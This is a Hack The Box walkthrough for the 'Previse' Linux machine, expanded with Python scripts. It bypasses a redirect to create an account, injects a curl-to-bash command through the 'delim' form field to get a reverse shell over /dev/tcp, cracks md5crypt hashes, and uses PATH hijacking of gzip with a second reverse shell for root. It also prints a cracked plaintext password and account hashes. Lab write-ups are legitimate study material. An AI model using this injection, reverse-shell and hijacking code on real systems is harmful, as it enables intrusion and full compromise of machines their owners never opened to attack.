
The new Linux machine on HTB is called Previse, and I'm going to root it today.
As usual I started with an nmap scan and got this:

Checking the web page on port 80 I found a simple login page and nothing more.
Running a directory brute-forcer against it turned up:
/css
/js
/nav.php
css and js weren't useful, but when I opened nav.php I found this:

Create account is the eye-catcher here, but it still redirects us to /login.php, so it's time to look at the request from another angle.
After trying some different approaches and different links, here is what I reached:

After sending the request and seeing this 302 response I was kind of confused, but

After a lot of searching I found a way to get /account.php: change the status line of the response from 302 to 200 in the proxy. The redirect is only a header; the server already sent the page body along with it (the PHP script keeps running after header('Location: ...') instead of exiting), so once the browser stops treating the response as a redirect it renders the form. Check this blog to know how to do it:
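To recognise this kind of execute-after-redirect without a proxy, here is a small checker, added as an example and not part of the original writeup. It requests the page with http.client (which never follows redirects), then flags a 3xx response that still carries a real HTML body. The host name previse.htb, the path /account.php, and the sample raw response are assumptions; the sample is constructed to look like the response the writeup describes.

```python
# Added example (not from the original post): fetch a page without
# following the redirect and test whether the body was sent anyway.
import http.client

HOST = "previse.htb"    # assumed hosts-file entry for the box
PATH = "/account.php"   # page named in the writeup (assumed to be the exact path)


def fetch_no_redirect(host, path, port=80, timeout=10):
    """GET a path and return (status, headers, body) without following 3xx.

    http.client does not follow redirects, so whatever body the server
    sends along with the 302 comes back untouched.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, dict(resp.getheaders()), resp.read()
    finally:
        conn.close()


def parse_raw_response(raw):
    """Split a raw HTTP/1.1 response (as shown in a proxy) into
    (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers, body


def is_execute_after_redirect(status, headers, body):
    """True when a redirect response still carries a page body.

    A PHP script that calls header('Location: ...') without exit() keeps
    running and prints its HTML, so the client is told to go elsewhere but
    the protected content is already in the response. Rewriting the status
    line to 200 in a proxy simply makes the browser render it.
    """
    if not 300 <= status < 400:
        return False
    location = {k.lower(): v for k, v in headers.items()}.get("location", "")
    text = body.decode("utf-8", errors="replace").lower()
    return bool(location) and ("<form" in text or "<html" in text)


# Constructed sample of the response the writeup describes: a 302 to
# login.php whose body still contains the account form.
SAMPLE_302 = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: login.php\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"<html><body><form method=\"post\">...</form></body></html>"
)

if __name__ == "__main__":
    status, headers, body = fetch_no_redirect(HOST, PATH)
    print(status, headers.get("Location"), len(body), "bytes of body")
    print("execute-after-redirect:", is_execute_after_redirect(status, headers, body))
```

A redirect with an empty or tiny body is the normal case; a redirect whose body contains a form is the signal that the server never stopped rendering.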
Now, after creating the account, I can access all the directories above, and in /files I found sitebackup.zip.

I downloaded it to check what it contains, and in there I found some credentials:

The MySQL root username and its password (we need a shell on the box before we can use these credentials).
After literally hours of searching and trying different ways to get into this machine, I saw a parameter called delim in logs.php that looked like it could be injected with a command to get a reverse shell.

Now we go to /file_logs.php, press submit with delim set to comma, and intercept the request.
It should look like this before injecting:

Now we add our injected command in the delim parameter. But first we need something to run: create the reverse shell on our attacking machine and start a web server to host it:
python3 -m http.server 9191
Here is the request after injecting our code:

Now we start our listener on the port we specified in the reverse shell, then forward the request:
nc -lvnp <port>
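The same steps as one script, added here as an example and not code from the writeup: it hosts the reverse shell the way python3 -m http.server does and submits the injected delim value. The attacker IP, the listener port, the PHPSESSID cookie name, the ';' separator, the curl | bash stager, and posting to /logs.php (the script the writeup names as taking delim) are all assumptions; the writeup only shows that the intercepted request has its delim value replaced. Start nc -lvnp on the listener port before running it.

```python
# Added example (not from the original post): host the reverse-shell script
# and send the delim injection. The nc listener is still started by hand.
import http.client
import http.server
import socketserver
import threading
import urllib.parse

TARGET_HOST = "previse.htb"    # assumed hosts-file entry
ATTACKER_IP = "10.10.14.5"     # assumed VPN address, change it
HTTP_PORT = 9191               # http.server port from the writeup
SHELL_PORT = 2424              # listener port for nc -lvnp (assumed)
SHELL_NAME = "shell.sh"        # assumed name of the hosted payload
SESSION_COOKIE = "PHPSESSID=replace-with-logged-in-session"  # assumed cookie name

# Same one-liner shape as the gzip shell later in the writeup.
REVERSE_SHELL = (
    "#!/bin/bash\n"
    f"/bin/sh -i >& /dev/tcp/{ATTACKER_IP}/{SHELL_PORT} 0>&1\n"
)


def build_delim_payload(attacker_ip, http_port, shell_name):
    """Value for the delim field: the legitimate delimiter followed by an
    injected command that downloads and runs the hosted script.

    ';' as separator and curl | bash as stager are assumptions; the writeup
    only states that a command is injected through this parameter."""
    return f"comma;curl http://{attacker_ip}:{http_port}/{shell_name}|bash"


def encode_form(fields):
    """application/x-www-form-urlencoded body, as the browser would send."""
    return urllib.parse.urlencode(fields)


def serve_payload(files, port):
    """Serve in-memory files over HTTP from a background thread."""

    class Handler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            name = self.path.lstrip("/")
            if name not in files:
                self.send_error(404)
                return
            data = files[name].encode()
            self.send_response(200)
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, *args):  # keep the console quiet
            pass

    socketserver.TCPServer.allow_reuse_address = True
    server = socketserver.TCPServer(("0.0.0.0", port), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def send_injection(host, cookie, payload, path="/logs.php"):
    """POST the injected delim value with the logged-in session cookie."""
    body = encode_form({"delim": payload})
    conn = http.client.HTTPConnection(host, 80, timeout=30)
    try:
        conn.request("POST", path, body=body, headers={
            "Host": host,
            "Cookie": cookie,
            "Content-Type": "application/x-www-form-urlencoded",
        })
        return conn.getresponse().status
    finally:
        conn.close()


if __name__ == "__main__":
    serve_payload({SHELL_NAME: REVERSE_SHELL}, HTTP_PORT)
    payload = build_delim_payload(ATTACKER_IP, HTTP_PORT, SHELL_NAME)
    print("sending delim =", payload)
    print("response status:", send_injection(TARGET_HOST, SESSION_COOKIE, payload))
```

The request itself is just the form the page already sends; only the delim value changes, which is why the injection survives a normal form submit.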

It worked and I got the shell I was looking for as www-data. Now we can use the credentials we found before for the MySQL database.
You can find them again in the file called config.php:

The credentials were correct and we logged in successfully. Now let's search this database for any other credentials.
# this command will display the tables in our database
mysql> show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+
2 rows in set (0.00 sec)
Here we got two tables, accounts and files. Let's check what is in accounts; maybe we can find more credentials:
mysql> SELECT * FROM accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.    | 2021-05-27 18:18:36 |
|  2 | far1s    | $1$🧂llol$J.VmdoVZ4IjW4C57oRv1m0    | 2021-08-05 13:10:08 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)
Finally, one more step forward: now we have one more username, m4lwhere, and its password hash (md5crypt, recognisable by the $1$ prefix).
Run hashcat and John the Ripper and let them find this password for us using rockyou.txt, with the hash saved in m4lwherepasswd.txt:
# cracking using John the Ripper:
john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt m4lwherepasswd.txt
# cracking using hashcat:
hashcat -a 0 -m 500 m4lwherepasswd.txt /usr/share/wordlists/rockyou.txt


Both took roughly half an hour, but hashcat was 3 minutes faster, so the meow tool won this time.
Now we log in via SSH as user m4lwhere:
ssh m4lwhere@previse.htb
password: ilovecody112235!
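To double-check the cracked password without rerunning the crackers, here is an md5crypt implementation in pure Python, added as an example and not part of the original post. It reproduces the $1$ algorithm that john (md5crypt-long) and hashcat (-m 500) attack, using only hashlib; the salt comes straight from the hash in the accounts table, emoji included, since md5crypt treats the salt as up to 8 raw bytes and the four-byte emoji plus "llol" fills exactly that.

```python
# Added example (not from the original post): FreeBSD-style md5crypt ($1$)
# so a cracked password can be verified against a $1$ hash offline.
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value, count):
    """Crypt-style base64: 6 bits at a time, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt):
    """Return the $1$ hash (bytes) of password with the given salt.

    Same algorithm as PHP crypt() and glibc for $1$ hashes; the salt is
    used as raw bytes and truncated to 8 of them.
    """
    pw = password.encode("utf-8") if isinstance(password, str) else password
    sb = (salt.encode("utf-8") if isinstance(salt, str) else salt)[:8]

    ctx = hashlib.md5(pw + MAGIC + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(remaining, 16)])
        remaining -= 16
    bit = len(pw)
    while bit:
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()

    # 1000 stretching rounds with the original's odd mixing order
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sb)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    groups = [
        (final[0] << 16) | (final[6] << 8) | final[12],
        (final[1] << 16) | (final[7] << 8) | final[13],
        (final[2] << 16) | (final[8] << 8) | final[14],
        (final[3] << 16) | (final[9] << 8) | final[15],
        (final[4] << 16) | (final[10] << 8) | final[5],
    ]
    encoded = b"".join(_to64(g, 4) for g in groups) + _to64(final[11], 2)
    return MAGIC + sb + b"$" + encoded


def split_md5crypt(hash_str):
    """Split '$1$salt$hash' into (salt, hash)."""
    parts = hash_str.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    return parts[2], parts[3]


def verify(password, hash_str):
    """True when password reproduces hash_str."""
    salt, _ = split_md5crypt(hash_str)
    return md5crypt(password, salt) == hash_str.encode("utf-8")


# Hash copied from the accounts table above; the salt is 🧂llol.
M4LWHERE_HASH = "$1$🧂llol$DQpmdvnb7EeuO6UaqRItf."

if __name__ == "__main__":
    print("ilovecody112235! matches:", verify("ilovecody112235!", M4LWHERE_HASH))
```

Running it confirms the cracked password reproduces the stored hash, which is the check to do before burning time on an SSH login that fails for an unrelated reason.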

Here is the first flag. Now we must find a way to become root and get the second flag.

Cool, we can run access_backup.sh as root.
Reading this bash script, we can see that it is run by cron as root, and that it calls gzip by its bare name rather than an absolute path:
gzip -c ("write on standard output, keep original files unchanged")
After some searching I found something called PATH hijacking, and it could be useful in our situation. It's a bit complex to understand at first, but practice makes perfect: when a script runs a command by bare name, the shell searches the directories in PATH in order and runs the first match, so if a directory we control comes first, our file runs as root instead of the real gzip.
First we need to be in a directory where we have write access, like /tmp.
Now we create a file there called gzip and put a reverse shell in it, so it looks like:
#!/bin/bash
/bin/sh -i >& /dev/tcp/<IP>/2424 0>&1
Then we put our directory at the front of PATH with $(pwd):.:$PATH:
export PATH=$(pwd):.:$PATH
All done? Don't forget to make gzip executable: chmod +x gzip
Now we are ready: start the listener in another terminal and run access_backup.sh with sudo.
attacking machine: nc -lvnp <PORT>
ssh shell: sudo /opt/scripts/access_backup.sh
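As an added example (not from the writeup), a script that does the triage behind this trick: it lists the commands a script invokes by bare name, lists the PATH directories we can write to, and shows the lookup order that makes the planted gzip win. The sample script body is constructed; access_backup.sh is not reproduced in the writeup, only its use of gzip -c, so the other lines are stand-ins. Everything happens in a temp directory and nothing is run with sudo.

```python
# Added example (not from the original post): find PATH-hijackable commands
# in a root-run script and demonstrate the lookup order in a temp dir.
import os
import re
import shutil
import stat
import tempfile

# Constructed stand-in for /opt/scripts/access_backup.sh: the real script is
# not shown in the writeup; what matters is that gzip is called by bare name
# while the other tools use absolute paths.
SAMPLE_SCRIPT = """#!/bin/bash
/usr/bin/date > /var/backups/last_run
gzip -c /var/log/apache2/access.log > /var/backups/access.log.gz
/usr/bin/chown root:root /var/backups/access.log.gz
"""

_CMD_RE = re.compile(r"^([A-Za-z0-9_.\-/]+)")


def bare_commands(script_text):
    """Commands invoked without a slash in their name: these are resolved
    through PATH and are the hijack candidates."""
    found = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = _CMD_RE.match(line)
        if m and "/" not in m.group(1) and m.group(1) not in found:
            found.append(m.group(1))
    return found


def writable_dirs(path_value):
    """Directories on a PATH string that the current user can write to."""
    return [d for d in path_value.split(":") if d and os.access(d, os.W_OK)]


def plant_fake(command, directory, body):
    """Write an executable file named like the target command (chmod +x)."""
    target = os.path.join(directory, command)
    with open(target, "w") as fh:
        fh.write(body)
    mode = os.stat(target).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    os.chmod(target, mode)
    return target


def resolve(command, path_value):
    """Which file a bare command name resolves to under a given PATH."""
    return shutil.which(command, path=path_value)


def demo():
    """Prepend a writable dir (as the writeup does with /tmp) and show that
    the planted gzip is found before the real one."""
    tmp = tempfile.mkdtemp()
    fake = plant_fake("gzip", tmp,
                      "#!/bin/bash\n/bin/sh -i >& /dev/tcp/<IP>/2424 0>&1\n")
    base = os.environ.get("PATH", "/usr/bin:/bin")
    hijacked_path = f"{tmp}:.:{base}"   # same shape as export PATH=$(pwd):.:$PATH
    return {
        "fake": fake,
        "before": resolve("gzip", base),
        "after": resolve("gzip", hijacked_path),
        "writable": writable_dirs(hijacked_path),
    }


if __name__ == "__main__":
    print("hijackable commands:", bare_commands(SAMPLE_SCRIPT))
    result = demo()
    print("gzip before:", result["before"])
    print("gzip after :", result["after"])
    print("writable PATH dirs:", result["writable"])
```

One caveat that decides whether this works at all: sudo has to pass our PATH through. A sudoers secure_path line (the Ubuntu default) replaces PATH with a fixed list of system directories, in which case the real gzip runs no matter what we export; a fix on the defender's side is simply to call /usr/bin/gzip by absolute path in the script.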

And bingo, congrats on rooting the machine!